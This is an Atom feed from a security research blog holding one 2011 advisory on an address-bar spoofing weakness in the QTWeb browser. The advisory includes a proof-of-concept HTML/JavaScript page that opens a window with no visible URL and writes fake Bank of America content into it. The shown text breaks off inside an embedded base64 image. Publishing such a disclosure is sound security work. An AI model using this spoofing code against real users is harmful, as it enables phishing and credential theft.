<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;A0YHQ3g7eCp7ImA9WhRVEU4.&quot;"><id>tag:blogger.com,1999:blog-9011578</id><updated>2012-01-09T20:58:52.600+01:00</updated><category term="crash" /><category term="phishing" /><category term="extensions" /><category term="bank" /><category term="SQL" /><category term="bug" /><category term="security" /><category term="vulnerability" /><category term="virus" /><category term="Acknowledgments" /><category term="DoS" /><category term="Spooff" /><category term="CSRF" /><category term="atmail" /><category term="scam" /><category term="XSS" /><category term="browsers" /><category term="patch" /><title>Lostmon Blogger</title><subtitle type="html">Security Research &amp;amp; Analisys:&lt;br&gt;
Personal Blog where I expose my investigations,&lt;br&gt;
 advisores and some outstanding news on security.&lt;br&gt;</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://lostmon.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://lostmon.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>187</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/LostmonBlogger" /><feedburner:info uri="lostmonblogger" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;A0MGSH4yeyp7ImA9WhdUFk4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-5419473408700392747</id><published>2011-10-03T12:55:00.001+02:00</published><updated>2011-10-03T12:57:09.093+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-03T12:57:09.093+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="phishing" /><category scheme="http://www.blogger.com/atom/ns#" term="bank" /><category scheme="http://www.blogger.com/atom/ns#" term="Spooff" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><title>QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks</title><content type="html">#################################################&lt;br /&gt;
QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks&lt;br /&gt;
Vendor URL: http://www.qtweb.net/&lt;br /&gt;
Vendor bugtrack=&amp;gt; http://code.google.com/p/qtweb/issues/detail?id=151&lt;br /&gt;
Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html&lt;br /&gt;
Vendor notify: YES exploit available: YES&lt;br /&gt;
##################################################&lt;br /&gt;
&lt;br /&gt;
###################&lt;br /&gt;
Description By vendor&lt;br /&gt;
###################&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome).&lt;/div&gt;
&lt;br /&gt;
######################&lt;br /&gt;
Vulnerability Description&lt;br /&gt;
######################&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
In a normal case when navigate to a site, the browser shows real URL But it has a weakness and a attacker can show a empty URL. This weakness can be used for pishing or spoof attacks because you can think that&amp;nbsp; you are in bank of america for example and the browser don't show nothing in&amp;nbsp; URL:) &lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s1600/qt1.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s400/qt1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Whithout Any URL&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Also a attacker can compose a popup with atributes and it can be used too for spoof or phishing attacks. toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0 &lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s1600/qt2.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s400/qt2.jpg" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Popup Whithout Toolbars and address bar&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
################&lt;br /&gt;
Versions afected&lt;br /&gt;
################&lt;br /&gt;
&lt;br /&gt;
QTweb 3.7.2 Vulnerable&lt;br /&gt;
QTweb 3.7.3 (buils 087) Vulnerable&lt;br /&gt;
and posible prior versions.&lt;br /&gt;
&lt;br /&gt;
######################&lt;br /&gt;
Proof Of Concept&lt;br /&gt;
######################&lt;br /&gt;
&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;nbsp; &amp;lt;title&amp;gt;QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;nbsp; &amp;lt;script type="text/javascript"&amp;gt;&lt;br /&gt;
var wx;&lt;br /&gt;
function invokePoC() {&lt;br /&gt;
&amp;nbsp; wx = open(":#:","newwin");&lt;br /&gt;
&amp;nbsp; setInterval("doit()",1);&lt;br /&gt;
}&lt;br /&gt;
function doit() {&lt;br /&gt;
&amp;nbsp; wx.document.open();&lt;br /&gt;
&amp;nbsp; wx.document.write("&amp;lt;title&amp;gt;Bank of America | Home | Personal&amp;lt;/title&amp;gt;&amp;lt;img src='data:image/gif;base64,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